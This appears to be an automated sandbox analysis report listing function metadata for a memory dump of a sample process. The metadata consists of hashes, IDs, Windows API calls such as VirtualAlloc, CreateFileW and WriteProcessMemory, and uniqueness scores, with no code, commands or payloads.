                    • Instruction ID: ffe672b7dce5b01f7f740e9cf0c198d5dce2a9f265c36232e38f5febf01a8d58
                    • Opcode Fuzzy Hash: 532070062cf11b9904d3a9db09fd8773f3dc478adfd5a9ce6003f0dfcfe5d1dd
                    • Instruction Fuzzy Hash: 4551183AE046169FEF16DA54CC81BBDB6B1FB98304F5651A8D087FB240DA34EE019F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                      • Part of subcall function 00D915C4: VirtualAlloc.KERNELBASE ref: 00D91643
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 4853ab38e3ee6ab3172fa8a93713d0e47700ea2fba302bc6369f40e7867e9981
                    • Instruction ID: b96b2797b591b640b35008e5d661d8ac9e051b95a20b23a2ff13791b55bf402a
                    • Opcode Fuzzy Hash: 4853ab38e3ee6ab3172fa8a93713d0e47700ea2fba302bc6369f40e7867e9981
                    • Instruction Fuzzy Hash: DC41283AE046169FEF15DA54CC81BBDB6B1FB98304F5651A8D047FB240DA34EE019F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                      • Part of subcall function 00D915C4: VirtualAlloc.KERNELBASE ref: 00D91643
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: d0931d3c0a29b7f7d1ee63a1d07ef245cda2e46c2bbe9825bb633b5d00c70897
                    • Instruction ID: d0aec9352e1126d7d5cbec437307be12ef39d7b4fcd39ef7150fc2591b759b88
                    • Opcode Fuzzy Hash: d0931d3c0a29b7f7d1ee63a1d07ef245cda2e46c2bbe9825bb633b5d00c70897
                    • Instruction Fuzzy Hash: 2E41D23AE446258FDF16CA54CC81BADB6B1FB98304F6651A8D18AEB240DA34EE419E50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                      • Part of subcall function 00D915C4: VirtualAlloc.KERNELBASE ref: 00D91643
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 17b0c341b52739a790c545d3b2fd629092981d63857a88dcb1ee279f33b8d765
                    • Instruction ID: 7054b1ae239bbd5b939f27bebd9c4d8542634c326e46a615b8c65cc6352e26a8
                    • Opcode Fuzzy Hash: 17b0c341b52739a790c545d3b2fd629092981d63857a88dcb1ee279f33b8d765
                    • Instruction Fuzzy Hash: 8341E43AE446258FDF16CE54CC81BADB7B1FB98304F5655A8D08AFB240CA34EE419F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: b820873df2fcea4a6e708b8f9a5522c674a9895d130da8e17574ea9c0984405b
                    • Instruction ID: cad01652d527a229700890bf5bc8388bef70f71dc6e491400a64710361c3d746
                    • Opcode Fuzzy Hash: b820873df2fcea4a6e708b8f9a5522c674a9895d130da8e17574ea9c0984405b
                    • Instruction Fuzzy Hash: 00517B35E18607EDEF39AB70AC12B7D2D54FF91B00F289559B28796082EE39CB816531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID: read
                    • API String ID: 621844428-2555855207
                    • Opcode ID: cb6bd99a343ba0c5f25fd0ccd8ce41c5f4a862fcf58d9a64fa7457bc24e33bc0
                    • Instruction ID: 42558203aff2e5e18976bffcc54f9d9a24f6d584198d9ed0fe36b64f144601e9
                    • Opcode Fuzzy Hash: cb6bd99a343ba0c5f25fd0ccd8ce41c5f4a862fcf58d9a64fa7457bc24e33bc0
                    • Instruction Fuzzy Hash: EDF0E93176C512FDEF5EA3646C2293D1884FBA0B19B16D22DB087D5187ED28C9012072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID: read
                    • API String ID: 621844428-2555855207
                    • Opcode ID: c55a1e3579fd569a3a4676985bf2f89f8d330299d34ffc2bbc19bbe4e4652b72
                    • Instruction ID: 84080405534fda6f86967751bfa82610f5e0fb449764ccb016e8928b9638138d
                    • Opcode Fuzzy Hash: c55a1e3579fd569a3a4676985bf2f89f8d330299d34ffc2bbc19bbe4e4652b72
                    • Instruction Fuzzy Hash: B8F0E521669502BDBF6E77602C22D390849FBA0B19725D20DB087C9587FD2889462471
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: m
                    • API String ID: 0-3775001192
                    • Opcode ID: 22f51a0c6e4f82a2a73faf25d516c2bad06a7d5efb6946187ae1608bb3eb2431
                    • Instruction ID: 8531645750998556f7c36ac68e7814add30bb8ac59ed73e25f1f2eb7a888f583
                    • Opcode Fuzzy Hash: 22f51a0c6e4f82a2a73faf25d516c2bad06a7d5efb6946187ae1608bb3eb2431
                    • Instruction Fuzzy Hash: 7B517C32E18201EDEF05DB64AC52B3C7EA9FF41708F28D119A087AB163DE74C9019BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID: m
                    • API String ID: 2538663250-3775001192
                    • Opcode ID: 516fedfe359e9bc17fdc314171fedff6de38101870687e966c8db859eec00c60
                    • Instruction ID: 9adc5b25a354f67b4662611622211014903ef4205f2182e47439024df3d503a2
                    • Opcode Fuzzy Hash: 516fedfe359e9bc17fdc314171fedff6de38101870687e966c8db859eec00c60
                    • Instruction Fuzzy Hash: E1515C32918601EDEF05DBA4AD52B3D7EA9FF41708F28D119A0879B163DE74C9019AB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID: m
                    • API String ID: 2538663250-3775001192
                    • Opcode ID: cd1b1c505157a8ba16f0de916322fb71060366f9898df66083f292515782007f
                    • Instruction ID: db69eb702fce153b068c1272854d4cb9592bfd9b9f9b9390e9777082ba9ef7d8
                    • Opcode Fuzzy Hash: cd1b1c505157a8ba16f0de916322fb71060366f9898df66083f292515782007f
                    • Instruction Fuzzy Hash: A7416A32D18701EDEF05DBA0AC42B3C7EA9FF41308F28D119A0879B163DE74C9019AB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 557cdcc39c23c8639c6a724c4ccfcc95f9922060c4b41ae0de32f6856295eeb9
                    • Instruction ID: a6ef72decdc145d97977fc0a5896175976920ed08e8502f3c9a54809d3a0f2df
                    • Opcode Fuzzy Hash: 557cdcc39c23c8639c6a724c4ccfcc95f9922060c4b41ae0de32f6856295eeb9
                    • Instruction Fuzzy Hash: 4F31573DA28117AEEF2B77608C03E382EA9FBC2704F24D149A083D9182ED348A026435
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 2345ff6e8315cfd2208d5671bc11a5bcfb8dafb5c5efe15de6b2c50965d4fb6d
                    • Instruction ID: b58cd8c315b709e4a3fc6c3cdfaffa79052bd388a4ddc8c584d93d0ba0b5c48d
                    • Opcode Fuzzy Hash: 2345ff6e8315cfd2208d5671bc11a5bcfb8dafb5c5efe15de6b2c50965d4fb6d
                    • Instruction Fuzzy Hash: 6931262DA28517AEEF2B77604C03E796E69FBC2705F24D149A087D9583ED358A026435
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 6bd592971602314f8097fbff9fa399dad12e58fc6d5e572a2e8fff8a3c20566f
                    • Instruction ID: 022615c6d0dc28df17d8d6aebd16d2f296a0bc8451e14fd434ab6688558b02c8
                    • Opcode Fuzzy Hash: 6bd592971602314f8097fbff9fa399dad12e58fc6d5e572a2e8fff8a3c20566f
                    • Instruction Fuzzy Hash: E231492DA24557AEDF2777704C03E7C2E69FBC3304F24D248A087D5583ED358A026575
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 4888ca9778e5dd17e4a144d2a959001da2cb10f22221b03b64b5fbbbd99a0110
                    • Instruction ID: 21dc6d64fe348e21e287333bbe8e56a817e61b7c4bc82b6eaf2c7609ed981df4
                    • Opcode Fuzzy Hash: 4888ca9778e5dd17e4a144d2a959001da2cb10f22221b03b64b5fbbbd99a0110
                    • Instruction Fuzzy Hash: D921787DE241179EEF27AB308C02AB92E79FBC2705F14E149A082D5553ED348B026971
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                      • Part of subcall function 00D912FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 4a9d0029bf77a45e0f1f56a039a75d53bdcb41ff4d69050af763e70dfa8184b6
                    • Instruction ID: ec1b68840c769a1401d5bfc3072b9e996041ae56f7e816a3d660823f8094555a
                    • Opcode Fuzzy Hash: 4a9d0029bf77a45e0f1f56a039a75d53bdcb41ff4d69050af763e70dfa8184b6
                    • Instruction Fuzzy Hash: D521236DE24557AEEF2B67604C03E796E69FBC2704F18A248A083D9583ED358A026571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                      • Part of subcall function 00D912FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: f58949bd25e95dea7aed7e68cc49ba356eaf0c8cab9df56d26ca38ebbcbf4dea
                    • Instruction ID: e97de0711e7f44b89ce1935b803ee95fd3aa1bbe1d3fb0721cf565b45e3f6fa9
                    • Opcode Fuzzy Hash: f58949bd25e95dea7aed7e68cc49ba356eaf0c8cab9df56d26ca38ebbcbf4dea
                    • Instruction Fuzzy Hash: 3021246DE24517AEEF2B67604C03A792E6DFBC2704F14A148A087D9583EE358A026971
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                      • Part of subcall function 00D912FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 2a603f0e1d2de1d0b3868fffa6be2bc5e14fdd64d552faa053dd15ac46bd165e
                    • Instruction ID: 1bc24b32633e859970bbe7eb74c059734405d94e15e5062ca0010e268942c403
                    • Opcode Fuzzy Hash: 2a603f0e1d2de1d0b3868fffa6be2bc5e14fdd64d552faa053dd15ac46bd165e
                    • Instruction Fuzzy Hash: 6221463DA24117AEDF2B6B708C03A782E79EBC2704F14E148A087D9583DE358B025931
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 00D912B0
                      • Part of subcall function 00D912FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 747cbf19506efbab8eccc3a2b0cc829c130a30676cb9ada8116f90b52f7eea42
                    • Instruction ID: 0332edaf4d405a213b77679d64e52c317d92eb03e6db8c1012dc085ead078c3e
                    • Opcode Fuzzy Hash: 747cbf19506efbab8eccc3a2b0cc829c130a30676cb9ada8116f90b52f7eea42
                    • Instruction Fuzzy Hash: 2321387DA241169EDF2B6B708C03A786E79EBC2304F14E149A087D5543DD354B025971
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26960fc846f8da6b10e223ccdbd21484f3497de6032a972b72585f5af6b37238
                    • Instruction ID: d614126690d83af92a938d46e5a2a8719738dc236c21c77e4d160dcf8772ff60
                    • Opcode Fuzzy Hash: 26960fc846f8da6b10e223ccdbd21484f3497de6032a972b72585f5af6b37238
                    • Instruction Fuzzy Hash: 06519D39E2C647EDEF3AAB706C12B792D59FF81B00F249119F28795082EE75CB816531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93f14e04f7cf3b6f39ad2e16ec220aee6291f99485a428cea0333de025a3d837
                    • Instruction ID: fd8ffa54cba456c3c3bb88c10eaeea4525ce687aed0037d20bfeff88ae8cc084
                    • Opcode Fuzzy Hash: 93f14e04f7cf3b6f39ad2e16ec220aee6291f99485a428cea0333de025a3d837
                    • Instruction Fuzzy Hash: 62518C39E2C647EDEF3AAB606C12B792D54FF80B01F24911DF28B95082EE75CB815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 04a73eaf2ff404960f5eaca17fdd77c68b7261e0e16dc6fac4e14b75259584c4
                    • Instruction ID: d85091a9e0a4642954400a352611071740b60a02bd67242cbafe95e13baef19d
                    • Opcode Fuzzy Hash: 04a73eaf2ff404960f5eaca17fdd77c68b7261e0e16dc6fac4e14b75259584c4
                    • Instruction Fuzzy Hash: F1419E39E18643EDFF39AB706C02B7D2955FF80B01F249119B24B990C2EE758B815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e1f44333333c3b3db287a12a561cbdf059bd621d2cb28150a4d4097a54772a1
                    • Instruction ID: 3b2647865bfef9fa87a2a7fb212b6e63e15d27124a3f96355490a5b1ced97791
                    • Opcode Fuzzy Hash: 9e1f44333333c3b3db287a12a561cbdf059bd621d2cb28150a4d4097a54772a1
                    • Instruction Fuzzy Hash: 6A416D39E18657EDEF3AAB705C02B7D2A54FF81B01F24921DB28B990C2EE758A815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 11ddbe8b0d2afa93fd9251e9774ee83570d27912607ef50639023ae84ffb9c1a
                    • Instruction ID: 485d924c18c2d4116b6f187bb0dfaaabde56a9a2727333f45e9a48801523b2c1
                    • Opcode Fuzzy Hash: 11ddbe8b0d2afa93fd9251e9774ee83570d27912607ef50639023ae84ffb9c1a
                    • Instruction Fuzzy Hash: FC418039E18657EDEF39AB705C12B7D2A54FF80B00F24911DF24B950C2EE758B815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: f360cb25ee24762f1a72c315db08375b2e1e1844ce2c11367e3e64feb230cba2
                    • Instruction ID: 18bb11575e495c1ac1e676295bb05d34fa739ea6441c134e4914aa6e5fe21c58
                    • Opcode Fuzzy Hash: f360cb25ee24762f1a72c315db08375b2e1e1844ce2c11367e3e64feb230cba2
                    • Instruction Fuzzy Hash: 42316B31A1C001FDEF1AA6B1EC02A3D3D15EB82705F25D42CE2C7A7052ED3189029A72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 03a8a0e5359804c419903552202bc81913591781f27f36925624dcb1d3500a26
                    • Instruction ID: 02a2f345e8466e2a6ae16e162ad67a8938c419f5682388800f93e382467f20e4
                    • Opcode Fuzzy Hash: 03a8a0e5359804c419903552202bc81913591781f27f36925624dcb1d3500a26
                    • Instruction Fuzzy Hash: 33317B3D629513ADEF1B67619C11A3E3999FF82B05F685519F483CA143EE34C9016531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 8a0cdac0080417db277899794cfd63dbe2429346801c8ef87e9ec42bdefde83b
                    • Instruction ID: 514e15eec0d67c18ec05bb4fb3fc07f58c780b6d5c6654922bf7729212daaaff
                    • Opcode Fuzzy Hash: 8a0cdac0080417db277899794cfd63dbe2429346801c8ef87e9ec42bdefde83b
                    • Instruction Fuzzy Hash: AD316E3DE28647EDFF39A7715C02B7D2A54FF81701F249219B28BA50C2ED76CA815531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 7013abfe96adcce5707ab82630f18204e182155a70321e584d08f785f950927b
                    • Instruction ID: 6e85e20b2a284e0b100e46751ab1dea5a1076701b1a6b53587c6b4fb0c9366a7
                    • Opcode Fuzzy Hash: 7013abfe96adcce5707ab82630f18204e182155a70321e584d08f785f950927b
                    • Instruction Fuzzy Hash: F2315B3291C402FDEF5A63B1AC12A3D7D15FB42745F25D42DE2C797053ED318902AAB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 282981bc8be1fdd28aeaaddc6f11a103794a354364ab08f14370f2deee634856
                    • Instruction ID: e758ed7e73ed720c558fb119e51b6f023879e79f818e0f7a74553ce111ddc3ef
                    • Opcode Fuzzy Hash: 282981bc8be1fdd28aeaaddc6f11a103794a354364ab08f14370f2deee634856
                    • Instruction Fuzzy Hash: FF319D3DE28647EDFF39A7716C02F7D2954FF80B41F249208B28BA50C2ED368A816531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 4f6be46e81c59d9b536364f6f0626e577d1a83cb315d6d293aaa5c9019b950c3
                    • Instruction ID: ff858497919036a661b160eb5fde3376b87ec7c012c02aca653103724dac0dd3
                    • Opcode Fuzzy Hash: 4f6be46e81c59d9b536364f6f0626e577d1a83cb315d6d293aaa5c9019b950c3
                    • Instruction Fuzzy Hash: B2318C3291C101FDEF5A63B1AC03A3D7D15EB42715F29D46DE2C797053DD318902AAB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 9c1f7e909fd3eea8a8a6f6b19e39fb1135c319c9b7c8841bc970084fcdb5188f
                    • Instruction ID: b3a344fff0e7102c67f9d236b0f50649bfb5493333467f2ec9db54b4f81af5e6
                    • Opcode Fuzzy Hash: 9c1f7e909fd3eea8a8a6f6b19e39fb1135c319c9b7c8841bc970084fcdb5188f
                    • Instruction Fuzzy Hash: 16318C3DE28253EDFF3AA7715C02B7D2A54FB81701F249209B28BA50C2ED368AC15531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 5a38f640a3c8a1dd13314036b4660e7b20149f41f2e0013dbe6fa994cc312140
                    • Instruction ID: e30cd153f2d88dbecafbb1b7d8c40831adcd2976b56ed01c5ebe14e1353c32de
                    • Opcode Fuzzy Hash: 5a38f640a3c8a1dd13314036b4660e7b20149f41f2e0013dbe6fa994cc312140
                    • Instruction Fuzzy Hash: 03315A3DE14713AEEF29AB309C02B7D7A65FB80701F119249F14BB5085EE358B415A71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 0f781015eee9def8cba4f67d4cabd7fb6a662d9d90dd8ca40c510e634fc99889
                    • Instruction ID: b440be60b1c1e704d0a967b337c18bff182cd2c62c080d9b143a77a349e59fcf
                    • Opcode Fuzzy Hash: 0f781015eee9def8cba4f67d4cabd7fb6a662d9d90dd8ca40c510e634fc99889
                    • Instruction Fuzzy Hash: 0B21073DA29517ADFF1A77615C12A3E2859FF81B15F68961CB483C9083EE38C5026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: a893d6afd5c6605f07021a134821f30031c9c8260e14392896996136f05ef476
                    • Instruction ID: 8afb23a094227fb3e7fc724ca24a575a78bf5349db838f1231bbb9607ba7b76f
                    • Opcode Fuzzy Hash: a893d6afd5c6605f07021a134821f30031c9c8260e14392896996136f05ef476
